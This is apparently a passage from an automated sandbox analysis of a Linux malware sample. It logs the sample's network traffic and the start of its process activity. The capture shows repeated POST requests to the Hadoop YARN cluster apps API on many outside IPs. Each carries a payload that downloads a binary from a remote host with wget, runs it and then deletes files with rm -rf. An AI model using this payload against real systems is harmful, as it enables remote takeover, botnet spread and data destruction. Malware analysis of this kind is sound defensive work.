                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                35192.168.2.2357430186.99.201.698088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:47.921823025 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 186.99.201.69:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:48.194422960 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 186.99.201.69:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:48.478420973 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 186.99.201.69:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:49.022335052 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 186.99.201.69:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:50.110136986 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 186.99.201.69:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                36192.168.2.2356838109.161.191.418088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:50.924696922 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 109.161.191.41:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:51.198333025 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 109.161.191.41:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                37192.168.2.234053862.49.198.588088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:53.927592039 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 62.49.198.58:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                38192.168.2.234732077.210.59.1608088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:59.935394049 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 77.210.59.160:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                39192.168.2.2358336140.203.230.1418088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:40:14.979958057 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 140.203.230.141:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:15.230771065 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 140.203.230.141:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:15.482733965 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 140.203.230.141:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:15.994682074 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 140.203.230.141:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:17.018528938 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 140.203.230.141:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                40192.168.2.235650432.181.180.758088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:40:20.984736919 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 32.181.180.75:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:21.221981049 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 32.181.180.75:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:21.461941957 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 32.181.180.75:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                System Behavior

                                                                                                General

                                                                                                Start time (UTC):22:36:44
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:/tmp/tVdq8lEt3e.elf
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
